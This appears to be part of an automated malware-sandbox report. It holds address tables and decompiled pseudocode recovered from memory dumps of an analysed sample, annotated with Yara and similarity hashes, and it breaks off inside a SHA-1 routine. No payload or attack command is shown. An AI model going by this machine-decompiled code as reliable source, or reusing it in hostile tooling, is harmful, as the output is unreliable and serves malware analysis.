                                                                      0x0041bcfe
                                                                      0x0041bd04
                                                                      0x0041bd16
                                                                      0x0041bd1c
                                                                      0x0041bd23
                                                                      0x0041bd29
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bd2f
                                                                      0x0041bd35
                                                                      0x0041bd41
                                                                      0x0041bd42
                                                                      0x0041bd4b
                                                                      0x0041bd51
                                                                      0x0041bd57
                                                                      0x0041bd5e
                                                                      0x0041bd65
                                                                      0x0041bd6b
                                                                      0x0041bd72
                                                                      0x0041bd7e
                                                                      0x0041bd85
                                                                      0x0041bd8b
                                                                      0x0041bd8e
                                                                      0x0041bd8f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bd9a
                                                                      0x0041bda0
                                                                      0x0041bda6
                                                                      0x0041bdb8
                                                                      0x0041bdb9
                                                                      0x0041bdba
                                                                      0x0041bdc1
                                                                      0x0041bdc7
                                                                      0x0041bdd3
                                                                      0x0041bdd9
                                                                      0x0041bddf
                                                                      0x0041bde5
                                                                      0x0041bdec
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bdf2
                                                                      0x0041be0b
                                                                      0x0041be11
                                                                      0x0041be17
                                                                      0x0041be1d
                                                                      0x0041be31
                                                                      0x0041be37
                                                                      0x0041be3d
                                                                      0x0041be53
                                                                      0x0041be54
                                                                      0x0041be5a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041be60
                                                                      0x0041be66
                                                                      0x0041be6c
                                                                      0x0041be7e
                                                                      0x0041be8d
                                                                      0x0041be93
                                                                      0x0041be99
                                                                      0x0041bea0
                                                                      0x0041bea8
                                                                      0x0041beb4
                                                                      0x0041beba
                                                                      0x0041bebd
                                                                      0x0041bec5
                                                                      0x0041becc
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bed8
                                                                      0x0041bedf
                                                                      0x0041bee0
                                                                      0x0041bee6
                                                                      0x0041bef2
                                                                      0x0041bef9
                                                                      0x0041befa
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bf00
                                                                      0x0041bf07
                                                                      0x0041bf11
                                                                      0x0041bf12
                                                                      0x0041bf18
                                                                      0x0041bf1c
                                                                      0x0041bf1f
                                                                      0x0041bf25
                                                                      0x0041bf3c
                                                                      0x0041bf43
                                                                      0x0041bf56
                                                                      0x0041bf57
                                                                      0x0041bf58
                                                                      0x0041bf59
                                                                      0x0041bf61
                                                                      0x0041bf67
                                                                      0x0041bf6a
                                                                      0x0041bf71
                                                                      0x0041bf77
                                                                      0x0041bf77
                                                                      0x0041bf83
                                                                      0x0041bf8a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041bf90
                                                                      0x0041bf96
                                                                      0x0041bfa2
                                                                      0x0041bfaf
                                                                      0x0041bfb6
                                                                      0x0041bfbd
                                                                      0x0041bfc9
                                                                      0x0041bfca
                                                                      0x0041bfe0
                                                                      0x0041bfec
                                                                      0x0041bff2
                                                                      0x0041bff8
                                                                      0x0041bffe
                                                                      0x0041c003
                                                                      0x0041c016
                                                                      0x0041c02f
                                                                      0x0041c033
                                                                      0x0041c039
                                                                      0x0041c039
                                                                      0x0041b4a6
                                                                      0x0041b4a6
                                                                      0x0041b4ac
                                                                      0x0041b4b3
                                                                      0x0041b4b4
                                                                      0x0041b4ba
                                                                      0x0041b4c0
                                                                      0x0041b4c7
                                                                      0x0041b4ce
                                                                      0x0041b4d4
                                                                      0x0041b4da
                                                                      0x0041b4dc
                                                                      0x0041b4e2
                                                                      0x0041b4e8
                                                                      0x0041b4f0
                                                                      0x0041b501
                                                                      0x0041b50d
                                                                      0x0041b50e
                                                                      0x0041b51a
                                                                      0x0041b521
                                                                      0x0041b52d
                                                                      0x0041b536
                                                                      0x0041b53c
                                                                      0x0041b53e
                                                                      0x0041b545
                                                                      0x0041b551
                                                                      0x0041b557
                                                                      0x0041b55d
                                                                      0x0041b560
                                                                      0x0041b566
                                                                      0x0041b572
                                                                      0x0041b578
                                                                      0x0041b579
                                                                      0x0041b580
                                                                      0x0041b587
                                                                      0x0041b58d
                                                                      0x0041b5a0
                                                                      0x0041b5a1
                                                                      0x0041b5a7
                                                                      0x0041b5ad
                                                                      0x0041b5c0
                                                                      0x0041b5c7
                                                                      0x0041b5d9
                                                                      0x0041b5df
                                                                      0x0041b5ee
                                                                      0x0041b5f5
                                                                      0x0041b5fb
                                                                      0x0041b602
                                                                      0x0041b603
                                                                      0x0041b609
                                                                      0x0041b615
                                                                      0x0041b61b
                                                                      0x0041b621
                                                                      0x0041b622
                                                                      0x0041b625
                                                                      0x0041b62b
                                                                      0x0041b633
                                                                      0x0041b634
                                                                      0x0041b652
                                                                      0x0041b658
                                                                      0x0041b65e
                                                                      0x0041b66a
                                                                      0x0041b671
                                                                      0x0041b672
                                                                      0x0041b678
                                                                      0x0041b67e
                                                                      0x0041b68a
                                                                      0x0041b690
                                                                      0x0041b6a2
                                                                      0x0041b6a8
                                                                      0x0041b6b4
                                                                      0x0041b6b5
                                                                      0x0041b6bb
                                                                      0x0041b6bc
                                                                      0x0041b6ce
                                                                      0x0041b6e1
                                                                      0x0041b6e2
                                                                      0x0041b6e8
                                                                      0x0041b6ee
                                                                      0x0041b6f4
                                                                      0x0041b6fb
                                                                      0x0041b707
                                                                      0x0041b70d
                                                                      0x0041b713
                                                                      0x0041b71a
                                                                      0x0041b71d
                                                                      0x0041b723
                                                                      0x0041b735
                                                                      0x0041b73c
                                                                      0x0041b742
                                                                      0x0041b748
                                                                      0x0041b74e
                                                                      0x0041b755
                                                                      0x0041b75b
                                                                      0x0041b760
                                                                      0x0041b766
                                                                      0x0041b76d
                                                                      0x0041b772
                                                                      0x0041b779
                                                                      0x0041b77f
                                                                      0x0041b785
                                                                      0x0041b786
                                                                      0x0041b787
                                                                      0x0041b793
                                                                      0x0041b7ac
                                                                      0x0041b7ad
                                                                      0x0041b7b6
                                                                      0x0041b7b9
                                                                      0x0041b7bf
                                                                      0x0041b7c5
                                                                      0x0041b7d7
                                                                      0x0041b7dd
                                                                      0x0041b7f0
                                                                      0x0041b7f3
                                                                      0x0041b7ff
                                                                      0x0041b800
                                                                      0x0041b806
                                                                      0x0041b80c
                                                                      0x0041b812
                                                                      0x0041b815
                                                                      0x0041b81b
                                                                      0x0041b821
                                                                      0x0041b822
                                                                      0x0041b7d7
                                                                      0x0041b779
                                                                      0x0041b742
                                                                      0x0041b6ce
                                                                      0x0041b68a
                                                                      0x0041b5ad
                                                                      0x0041b4e8
                                                                      0x00000000

                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362232664.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                      Yara matches
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: 0$0
                                                                      • API String ID: 0-203156872
                                                                      • Opcode ID: e279504ad6b9489e5e71e05736d18fbc5aa09aceb2d74ba14c0ebc35aaf5a1f6
                                                                      • Instruction ID: a32b4041c734977c4391b1c176f168cb0998658cff4236d75583e2be8438dec8
                                                                      • Opcode Fuzzy Hash: e279504ad6b9489e5e71e05736d18fbc5aa09aceb2d74ba14c0ebc35aaf5a1f6
                                                                      • Instruction Fuzzy Hash: 81526532918791CFDB02DF38D99AB913FB2F752320B08424ED5A2935D6D738255ACF85
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 60%
                                                                      			E00ABE539(unsigned int* __ecx, intOrPtr __edx, signed int _a4, signed int _a8) {
                                                                      				signed int _v20;
                                                                      				char _v24;
                                                                      				signed int _v40;
                                                                      				char _v44;
                                                                      				intOrPtr _v48;
                                                                      				signed int _v52;
                                                                      				unsigned int _v56;
                                                                      				char _v60;
                                                                      				signed int _v64;
                                                                      				char _v68;
                                                                      				signed int _v72;
                                                                      				void* __ebx;
                                                                      				void* __edi;
                                                                      				char _t87;
                                                                      				signed int _t90;
                                                                      				signed int _t94;
                                                                      				signed int _t100;
                                                                      				intOrPtr* _t113;
                                                                      				signed int _t122;
                                                                      				void* _t132;
                                                                      				void* _t135;
                                                                      				signed int _t139;
                                                                      				signed int* _t141;
                                                                      				signed int _t146;
                                                                      				signed int _t147;
                                                                      				void* _t153;
                                                                      				signed int _t155;
                                                                      				signed int _t159;
                                                                      				char _t166;
                                                                      				void* _t172;
                                                                      				void* _t176;
                                                                      				signed int _t177;
                                                                      				intOrPtr* _t179;
                                                                      
                                                                      				_t179 = __ecx;
                                                                      				_v48 = __edx;
                                                                      				_v68 = 0;
                                                                      				_v72 = 0;
                                                                      				_push(__ecx[1]);
                                                                      				_push( *__ecx);
                                                                      				_push(0);
                                                                      				_t153 = 0x14;
                                                                      				_t135 = _t153;
                                                                      				_t132 = E00ABBBBB(_t135, _t153);
                                                                      				if(_t132 == 0) {
                                                                      					_t166 = _v68;
                                                                      					goto L43;
                                                                      				} else {
                                                                      					_t155 = 0;
                                                                      					_v52 = 0;
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					asm("stosd");
                                                                      					_v56 = __ecx[1];
                                                                      					if( *__ecx >> 8 < 2) {
                                                                      						_t155 = 1;
                                                                      						_v52 = 1;
                                                                      					}
                                                                      					_t139 = _a4;
                                                                      					_t87 = (_t155 << 0xc) + _t139;
                                                                      					_v60 = _t87;
                                                                      					if(_t87 < _t139) {
                                                                      						L11:
                                                                      						_t166 = _v68;
                                                                      						L12:
                                                                      						if(_t132 != 0) {
                                                                      							E00ABBCD2(_t132,  *_t179,  *((intOrPtr*)(_t179 + 4)));
                                                                      						}
                                                                      						L43:
                                                                      						if(_v72 != 0) {
                                                                      							_push( *((intOrPtr*)(_t179 + 4)));
                                                                      							_push( *_t179);
                                                                      							_push(0x8000);
                                                                      							E00ABAFDE( &_v72,  &_v60);
                                                                      						}
                                                                      						L46:
                                                                      						return _t166;
                                                                      					}
                                                                      					_t90 =  *(_t179 + 0xc) & 0x40000000;
                                                                      					asm("sbb edi, edi");
                                                                      					_t172 = ( ~_t90 & 0x0000003c) + 4;
                                                                      					if(_t90 != 0) {
                                                                      						_push(0);
                                                                      						_push(0x14);
                                                                      						_push( &_v44);
                                                                      						_push(3);
                                                                      						_push(_t179);
                                                                      						_push(0xffffffff);
                                                                      						if(E00A39730() < 0 || (_v40 & 0x00000060) == 0 || _v44 != _t179) {
                                                                      							_push(_t139);
                                                                      							E00ABA80D(_t179, 1, _v40, 0);
                                                                      							_t172 = 4;
                                                                      						}
                                                                      					}
                                                                      					_t141 =  &_v72;
                                                                      					if(E00ABA854(_t141,  &_v60, 0, 0x2000, _t172, _t179,  *_t179,  *((intOrPtr*)(_t179 + 4))) >= 0) {
                                                                      						_v64 = _a4;
                                                                      						_t94 =  *(_t179 + 0xc) & 0x40000000;
                                                                      						asm("sbb edi, edi");
                                                                      						_t176 = ( ~_t94 & 0x0000003c) + 4;
                                                                      						if(_t94 != 0) {
                                                                      							_push(0);
                                                                      							_push(0x14);
                                                                      							_push( &_v24);
                                                                      							_push(3);
                                                                      							_push(_t179);
                                                                      							_push(0xffffffff);
                                                                      							if(E00A39730() < 0 || (_v20 & 0x00000060) == 0 || _v24 != _t179) {
                                                                      								_push(_t141);
                                                                      								E00ABA80D(_t179, 1, _v20, 0);
                                                                      								_t176 = 4;
                                                                      							}
                                                                      						}
                                                                      						if(E00ABA854( &_v72,  &_v64, 0, 0x1000, _t176, 0,  *_t179,  *((intOrPtr*)(_t179 + 4))) < 0) {
                                                                      							goto L11;
                                                                      						} else {
                                                                      							_t177 = _v64;
                                                                      							 *((intOrPtr*)(_t132 + 0xc)) = _v72;
                                                                      							_t100 = _v52 + _v52;
                                                                      							_t146 =  *(_t132 + 0x10) & 0x00000ffd | _t177 & 0xfffff000 | _t100;
                                                                      							 *(_t132 + 0x10) = _t146;
                                                                      							asm("bsf eax, [esp+0x18]");
                                                                      							_v52 = _t100;
                                                                      							 *(_t132 + 0x10) = (_t100 << 0x00000002 ^ _t146) & 0x000000fc ^ _t146;
                                                                      							 *((short*)(_t132 + 0xc)) = _t177 - _v48;
                                                                      							_t47 =  &_a8;
                                                                      							 *_t47 = _a8 & 0x00000001;
                                                                      							if( *_t47 == 0) {
                                                                      								E00A12280(_t179 + 0x30, _t179 + 0x30);
                                                                      							}
                                                                      							_t147 =  *(_t179 + 0x34);
                                                                      							_t159 =  *(_t179 + 0x38) & 1;
                                                                      							_v68 = 0;
                                                                      							if(_t147 == 0) {
                                                                      								L35:
                                                                      								E00A0B090(_t179 + 0x34, _t147, _v68, _t132);
                                                                      								if(_a8 == 0) {
                                                                      									E00A0FFB0(_t132, _t177, _t179 + 0x30);
                                                                      								}
                                                                      								asm("lock xadd [eax], ecx");
                                                                      								asm("lock xadd [eax], edx");
                                                                      								_t132 = 0;
                                                                      								_v72 = _v72 & 0;
                                                                      								_v68 = _v72;
                                                                      								if(E00A17D50() == 0) {
                                                                      									_t113 = 0x7ffe0388;
                                                                      								} else {
                                                                      									_t177 = _v64;
                                                                      									_t113 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
                                                                      								}
                                                                      								if( *_t113 == _t132) {
                                                                      									_t166 = _v68;
                                                                      									goto L46;
                                                                      								} else {
                                                                      									_t166 = _v68;
                                                                      									E00AAFEC0(_t132, _t179, _t166, _t177 + 0x1000);
                                                                      									goto L12;
                                                                      								}
                                                                      							} else {
                                                                      								L23:
                                                                      								while(1) {
                                                                      									if(_v72 < ( *(_t147 + 0xc) & 0xffff0000)) {
                                                                      										_t122 =  *_t147;
                                                                      										if(_t159 == 0) {
                                                                      											L32:
                                                                      											if(_t122 == 0) {
                                                                      												L34:
                                                                      												_v68 = 0;
                                                                      												goto L35;
                                                                      											}
                                                                      											L33:
                                                                      											_t147 = _t122;
                                                                      											continue;
                                                                      										}
                                                                      										if(_t122 == 0) {
                                                                      											goto L34;
                                                                      										}
                                                                      										_t122 = _t122 ^ _t147;
                                                                      										goto L32;
                                                                      									}
                                                                      									_t122 =  *(_t147 + 4);
                                                                      									if(_t159 == 0) {
                                                                      										L27:
                                                                      										if(_t122 != 0) {
                                                                      											goto L33;
                                                                      										}
                                                                      										L28:
                                                                      										_v68 = 1;
                                                                      										goto L35;
                                                                      									}
                                                                      									if(_t122 == 0) {
                                                                      										goto L28;
                                                                      									}
                                                                      									_t122 = _t122 ^ _t147;
                                                                      									goto L27;
                                                                      								}
                                                                      							}
                                                                      						}
                                                                      					}
                                                                      					_v72 = _v72 & 0x00000000;
                                                                      					goto L11;
                                                                      				}
                                                                      			}





































                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID:
                                                                      • String ID: `$`
                                                                      • API String ID: 0-197956300
                                                                      • Opcode ID: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction ID: ebf0ade6fd28c18ea3bbb70ba4b926d256627d993bf46b59b21530d4b636effd
                                                                      • Opcode Fuzzy Hash: 05a91a0fb7c852bb70cf50c65af3218cd2861133de0ca7c3fb946f23ed8e9edd
                                                                      • Instruction Fuzzy Hash: 3B919F312043419FE724CF65C941B9BB7EABF84714F14892DF999CB282EB74E944CB92
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 77%
                                                                      			E00A751BE(void* __ebx, void* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
                                                                      				signed short* _t63;
                                                                      				signed int _t64;
                                                                      				signed int _t65;
                                                                      				signed int _t67;
                                                                      				intOrPtr _t74;
                                                                      				intOrPtr _t84;
                                                                      				intOrPtr _t88;
                                                                      				intOrPtr _t94;
                                                                      				void* _t100;
                                                                      				void* _t103;
                                                                      				intOrPtr _t105;
                                                                      				signed int _t106;
                                                                      				short* _t108;
                                                                      				signed int _t110;
                                                                      				signed int _t113;
                                                                      				signed int* _t115;
                                                                      				signed short* _t117;
                                                                      				void* _t118;
                                                                      				void* _t119;
                                                                      
                                                                      				_push(0x80);
                                                                      				_push(0xad05f0);
                                                                      				E00A4D0E8(__ebx, __edi, __esi);
                                                                      				 *((intOrPtr*)(_t118 - 0x80)) = __edx;
                                                                      				_t115 =  *(_t118 + 0xc);
                                                                      				 *(_t118 - 0x7c) = _t115;
                                                                      				 *((char*)(_t118 - 0x65)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      				_t113 = 0;
                                                                      				 *((intOrPtr*)(_t118 - 0x6c)) = 0;
                                                                      				 *((intOrPtr*)(_t118 - 4)) = 0;
                                                                      				_t100 = __ecx;
                                                                      				if(_t100 == 0) {
                                                                      					 *(_t118 - 0x90) =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x24;
                                                                      					E00A0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                                                                      					 *((char*)(_t118 - 0x65)) = 1;
                                                                      					_t63 =  *(_t118 - 0x90);
                                                                      					_t101 = _t63[2];
                                                                      					_t64 =  *_t63 & 0x0000ffff;
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					L20:
                                                                      					_t65 = _t64 >> 1;
                                                                      					L21:
                                                                      					_t108 =  *((intOrPtr*)(_t118 - 0x80));
                                                                      					if(_t108 == 0) {
                                                                      						L27:
                                                                      						 *_t115 = _t65 + 1;
                                                                      						_t67 = 0xc0000023;
                                                                      						L28:
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t67;
                                                                      						L29:
                                                                      						 *((intOrPtr*)(_t118 - 4)) = 0xfffffffe;
                                                                      						E00A753CA(0);
                                                                      						return E00A4D130(0, _t113, _t115);
                                                                      					}
                                                                      					if(_t65 >=  *((intOrPtr*)(_t118 + 8))) {
                                                                      						if(_t108 != 0 &&  *((intOrPtr*)(_t118 + 8)) >= 1) {
                                                                      							 *_t108 = 0;
                                                                      						}
                                                                      						goto L27;
                                                                      					}
                                                                      					 *_t115 = _t65;
                                                                      					_t115 = _t65 + _t65;
                                                                      					E00A3F3E0(_t108, _t101, _t115);
                                                                      					 *((short*)(_t115 +  *((intOrPtr*)(_t118 - 0x80)))) = 0;
                                                                      					_t67 = 0;
                                                                      					goto L28;
                                                                      				}
                                                                      				_t103 = _t100 - 1;
                                                                      				if(_t103 == 0) {
                                                                      					_t117 =  *((intOrPtr*)( *[fs:0x30] + 0x10)) + 0x38;
                                                                      					_t74 = E00A13690(1, _t117, 0x9d1810, _t118 - 0x74);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = _t74;
                                                                      					_t101 = _t117[2];
                                                                      					_t113 =  *((intOrPtr*)(_t118 - 0x6c));
                                                                      					if(_t74 < 0) {
                                                                      						_t64 =  *_t117 & 0x0000ffff;
                                                                      						_t115 =  *(_t118 - 0x7c);
                                                                      						goto L20;
                                                                      					}
                                                                      					_t65 = (( *(_t118 - 0x74) & 0x0000ffff) >> 1) + 1;
                                                                      					_t115 =  *(_t118 - 0x7c);
                                                                      					goto L21;
                                                                      				}
                                                                      				if(_t103 == 1) {
                                                                      					_t105 = 4;
                                                                      					 *((intOrPtr*)(_t118 - 0x78)) = _t105;
                                                                      					 *((intOrPtr*)(_t118 - 0x70)) = 0;
                                                                      					_push(_t118 - 0x70);
                                                                      					_push(0);
                                                                      					_push(0);
                                                                      					_push(_t105);
                                                                      					_push(_t118 - 0x78);
                                                                      					_push(0x6b);
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = E00A3AA90();
                                                                      					 *((intOrPtr*)(_t118 - 0x64)) = 0;
                                                                      					_t113 = L00A14620(_t105,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8,  *((intOrPtr*)(_t118 - 0x70)));
                                                                      					 *((intOrPtr*)(_t118 - 0x6c)) = _t113;
                                                                      					if(_t113 != 0) {
                                                                      						_push(_t118 - 0x70);
                                                                      						_push( *((intOrPtr*)(_t118 - 0x70)));
                                                                      						_push(_t113);
                                                                      						_push(4);
                                                                      						_push(_t118 - 0x78);
                                                                      						_push(0x6b);
                                                                      						_t84 = E00A3AA90();
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t84;
                                                                      						if(_t84 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t110 = 0;
                                                                      						_t106 = 0;
                                                                      						while(1) {
                                                                      							 *((intOrPtr*)(_t118 - 0x84)) = _t110;
                                                                      							 *(_t118 - 0x88) = _t106;
                                                                      							if(_t106 >= ( *(_t113 + 0xa) & 0x0000ffff)) {
                                                                      								break;
                                                                      							}
                                                                      							_t110 = _t110 + ( *(_t106 * 0x2c + _t113 + 0x21) & 0x000000ff);
                                                                      							_t106 = _t106 + 1;
                                                                      						}
                                                                      						_t88 = E00A7500E(_t106, _t118 - 0x3c, 0x20, _t118 - 0x8c, 0, 0, L"%u", _t110);
                                                                      						_t119 = _t119 + 0x1c;
                                                                      						 *((intOrPtr*)(_t118 - 0x64)) = _t88;
                                                                      						if(_t88 < 0) {
                                                                      							goto L29;
                                                                      						}
                                                                      						_t101 = _t118 - 0x3c;
                                                                      						_t65 =  *((intOrPtr*)(_t118 - 0x8c)) - _t118 - 0x3c >> 1;
                                                                      						goto L21;
                                                                      					}
                                                                      					_t67 = 0xc0000017;
                                                                      					goto L28;
                                                                      				}
                                                                      				_push(0);
                                                                      				_push(0x20);
                                                                      				_push(_t118 - 0x60);
                                                                      				_push(0x5a);
                                                                      				_t94 = E00A39860();
                                                                      				 *((intOrPtr*)(_t118 - 0x64)) = _t94;
                                                                      				if(_t94 < 0) {
                                                                      					goto L29;
                                                                      				}
                                                                      				if( *((intOrPtr*)(_t118 - 0x50)) == 1) {
                                                                      					_t101 = L"Legacy";
                                                                      					_push(6);
                                                                      				} else {
                                                                      					_t101 = L"UEFI";
                                                                      					_push(4);
                                                                      				}
                                                                      				_pop(_t65);
                                                                      				goto L21;
                                                                      			}


                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 00000003.00000002.362484346.00000000009D0000.00000040.00000001.sdmp, Offset: 009D0000, based on PE: true
                                                                      Similarity
                                                                      • API ID: InitializeThunk
                                                                      • String ID: Legacy$UEFI
                                                                      • API String ID: 2994545307-634100481
                                                                      • Opcode ID: 44bdafaa85117f62bcc33610eae910d3e35576dbbbf3d14c0a608391280ae6ca
                                                                      • Instruction ID: 822b0c5c353638a156bebd34282b113477544e758550d1b102130faffed318ad
                                                                      • Opcode Fuzzy Hash: 44bdafaa85117f62bcc33610eae910d3e35576dbbbf3d14c0a608391280ae6ca
                                                                      • Instruction Fuzzy Hash: 49515DB1E00A199FDB24DFA8CD50AAEB7F8FF48740F14C02DE559EB252DAB19940CB50
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      C-Code - Quality: 72%
                                                                      			E00408C5B(signed int* _a4) {
                                                                      				signed int _v8;
                                                                      				signed int _v12;
                                                                      				signed int _v16;
                                                                      				char _v304;
                                                                      				signed char* _t278;
                                                                      				signed int* _t279;
                                                                      				signed int _t280;
                                                                      				signed int _t286;
                                                                      				signed int _t289;
                                                                      				signed int _t293;
                                                                      				signed int _t296;
                                                                      				signed int _t300;
                                                                      				signed int _t304;
                                                                      				signed int _t306;
                                                                      				signed int _t312;
                                                                      				signed int _t320;
                                                                      				signed int _t322;
                                                                      				signed int _t325;
                                                                      				signed int _t327;
                                                                      				signed int _t336;
                                                                      				signed int _t342;
                                                                      				signed int _t343;
                                                                      				signed int _t348;
                                                                      				signed int _t356;
                                                                      				signed int _t360;
                                                                      				signed int _t361;
                                                                      				signed int _t365;
                                                                      				signed int _t368;
                                                                      				signed int _t372;
                                                                      				signed int _t373;
                                                                      				signed int _t402;
                                                                      				signed int _t407;
                                                                      				signed int _t413;
                                                                      				signed int _t416;
                                                                      				signed int _t423;
                                                                      				signed int _t426;
                                                                      				signed int _t435;
                                                                      				signed int _t437;
                                                                      				signed int _t440;
                                                                      				signed int _t448;
                                                                      				signed int _t463;
                                                                      				signed int _t466;
                                                                      				signed int _t467;
                                                                      				signed int _t468;
                                                                      				signed int _t474;
                                                                      				signed int _t482;
                                                                      				signed int _t483;
                                                                      				signed int* _t484;
                                                                      				signed int* _t487;
                                                                      				signed int _t494;
                                                                      				signed int _t497;
                                                                      				signed int _t502;
                                                                      				signed int _t505;
                                                                      				signed int _t508;
                                                                      				signed int _t511;
                                                                      				signed int _t512;
                                                                      				signed int _t516;
                                                                      				signed int _t528;
                                                                      				signed int _t531;
                                                                      				signed int _t538;
                                                                      				void* _t544;
                                                                      				void* _t546;
                                                                      
                                                                      				asm("scasd");
                                                                      				_t544 = _t546;
                                                                      				_t487 = _a4;
                                                                      				_t356 = 0;
                                                                      				_t2 =  &(_t487[7]); // 0x1b
                                                                      				_t278 = _t2;
                                                                      				do {
                                                                      					 *(_t544 + _t356 * 4 - 0x14c) = ((( *(_t278 - 1) & 0x000000ff) << 0x00000008 |  *_t278 & 0x000000ff) << 0x00000008 | _t278[1] & 0x000000ff) << 0x00000008 | _t278[2] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x148) = (((_t278[3] & 0x000000ff) << 0x00000008 | _t278[4] & 0x000000ff) << 0x00000008 | _t278[5] & 0x000000ff) << 0x00000008 | _t278[6] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x144) = (((_t278[7] & 0x000000ff) << 0x00000008 | _t278[8] & 0x000000ff) << 0x00000008 | _t278[9] & 0x000000ff) << 0x00000008 | _t278[0xa] & 0x000000ff;
                                                                      					 *(_t544 + _t356 * 4 - 0x140) = (((_t278[0xb] & 0x000000ff) << 0x00000008 | _t278[0xc] & 0x000000ff) << 0x00000008 | _t278[0xd] & 0x000000ff) << 0x00000008 | _t278[0xe] & 0x000000ff;
                                                                      					_t356 = _t356 + 4;
                                                                      					_t278 =  &(_t278[0x10]);
                                                                      				} while (_t356 < 0x10);
                                                                      				_t279 =  &_v304;
                                                                      				_v8 = 0x10;
                                                                      				do {
                                                                      					_t402 =  *(_t279 - 0x18);
                                                                      					_t463 =  *(_t279 - 0x14);
                                                                      					_t360 =  *(_t279 - 0x20) ^ _t279[5] ^  *_t279 ^ _t402;
                                                                      					asm("rol ecx, 1");
                                                                      					asm("rol ebx, 1");
                                                                      					_t279[9] =  *(_t279 - 0x1c) ^ _t279[6] ^ _t279[1] ^ _t463;
                                                                      					_t279[8] = _t360;
                                                                      					_t320 = _t279[7] ^  *(_t279 - 0x10) ^ _t279[2];
                                                                      					_t279 =  &(_t279[4]);
                                                                      					asm("rol ebx, 1");
                                                                      					asm("rol edx, 1");
                                                                      					_t46 =  &_v8;
                                                                      					 *_t46 = _v8 - 1;
                                                                      					_t279[6] = _t320 ^ _t402;
                                                                      					_t279[7] =  *(_t279 - 0x1c) ^  *(_t279 - 4) ^ _t360 ^ _t463;
                                                                      				} while ( *_t46 != 0);
                                                                      				_t322 =  *_t487;
                                                                      				_t280 = _t487[1];
                                                                      				_t361 = _t487[2];
                                                                      				_t407 = _t487[3];
                                                                      				_v12 = _t322;
                                                                      				_v16 = _t487[4];
                                                                      				_v8 = 0;
                                                                      				do {
                                                                      					asm("rol ebx, 0x5");
                                                                      					_t466 = _v8;
                                                                      					_t494 = _t322 + ( !_t280 & _t407 | _t361 & _t280) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x14c)) + _v16 + 0x5a827999;
                                                                      					_t325 = _v12;
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t407;
                                                                      					_v12 = _t494;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v8 = _t361;
                                                                      					_t413 = _t494 + ( !_t325 & _t361 | _t280 & _t325) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x148)) + _v16 + 0x5a827999;
                                                                      					_t497 = _t280;
                                                                      					asm("ror ebx, 0x2");
                                                                      					_v16 = _v8;
                                                                      					_t365 = _v12;
                                                                      					_v8 = _t325;
                                                                      					_t327 = _v8;
                                                                      					_v12 = _t413;
                                                                      					asm("rol edx, 0x5");
                                                                      					_t286 = _t413 + ( !_t365 & _t497 | _t325 & _t365) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x144)) + _v16 + 0x5a827999;
                                                                      					_t416 = _v12;
                                                                      					_v16 = _t497;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_v8 = _t365;
                                                                      					_v12 = _t286;
                                                                      					asm("rol eax, 0x5");
                                                                      					_v16 = _t327;
                                                                      					_t502 = _t286 + ( !_t416 & _t327 | _t365 & _t416) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x140)) + _v16 + 0x5a827999;
                                                                      					_t361 = _v12;
                                                                      					_t289 = _v8;
                                                                      					asm("ror edx, 0x2");
                                                                      					_v8 = _t416;
                                                                      					_v12 = _t502;
                                                                      					asm("rol esi, 0x5");
                                                                      					_v16 = _t289;
                                                                      					_t280 = _v12;
                                                                      					_t505 = _t502 + ( !_t361 & _t289 | _t416 & _t361) +  *((intOrPtr*)(_t544 + _t466 * 4 - 0x13c)) + _v16 + 0x5a827999;
                                                                      					_t407 = _v8;
                                                                      					asm("ror ecx, 0x2");
                                                                      					_t467 = _t466 + 5;
                                                                      					_t322 = _t505;
                                                                      					_v12 = _t322;
                                                                      					_v8 = _t467;
                                                                      				} while (_t467 < 0x14);
                                                                      				_t468 = 0x14;
                                                                      				do {
                                                                      					asm("rol esi, 0x5");
                                                                      					asm("ror eax, 0x2");
                                                                      					_v16 = _t407;
                                                                      					_t508 = _t505 + (_t407 ^ _t361 ^ _t280) +  *((intOrPtr*)(_t544 + _t468 * 4 - 0x14c)) + _v16 + 0x6ed9eba1;
                                                                      					_t336 = _v12;
                                                                      					_v12 = _t508;
